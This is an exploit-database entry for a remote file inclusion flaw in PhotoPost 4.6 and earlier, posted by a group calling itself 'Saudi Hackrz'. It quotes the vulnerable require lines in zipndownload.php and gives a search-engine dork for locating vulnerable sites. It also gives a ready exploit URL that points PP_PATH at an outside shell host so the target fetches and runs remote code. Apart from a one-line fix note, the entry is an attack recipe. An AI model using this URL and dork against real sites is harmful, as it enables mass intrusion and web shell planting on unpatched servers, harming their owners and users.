PhotoPost <= 4.6 (PP_PATH) Remote File Include Vulnerability

2006-09-15T00:00:00
ID 1337DAY-ID-835
Type zdt
Reporter Saudi Hackrz
Modified 2006-09-15T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ============================================================
PhotoPost <= 4.6 (PP_PATH) Remote File Include Vulnerability
============================================================



#====================================================================
#PhotoPost => 4.6 (PP_PATH) Remote File Inclusion Exploit
#====================================================================
#
#Critical Level : Dangerous
#
#By Saudi Hackrz
#
#http://www.popphoto.com/
#
#=================================================================
#
#Script Name: PhotoPost 4.6 & 4.5 & 4.x.....4.0
#Fix : update To 4.7 or 4.8
#Script :)
#
#=================================================================
#Bug in : zipndownload.php
#        require "$PP_PATH/languages/$pplang/showgallery.php";
#        require "$PP_PATH/login-inc.php";
#
#in <<<<  zipndownload.php & .... :)
#Dork :in Yahoo ---: "Powered by: PhotoPost PHP 4.6" or "Powered by: PhotoPost PHP 4.5"
#=================================================================
#
#Exploit :
#--------------------------------
#
#http://site.com/[path]/zipndownload.php?PP_PATH=http://SHELLURL.COM?
#
#=================================I LOVE SAUDI
ARABIA=============================================
#Discoverd By : Saudi Hackrz
#
#GreetZ :SnIpEr_Sa , King18 , LeCoPrA And All My Frind
==================================I LOVE SAUDI ARABIA=============================================#



#  0day.today [2018-02-07]  #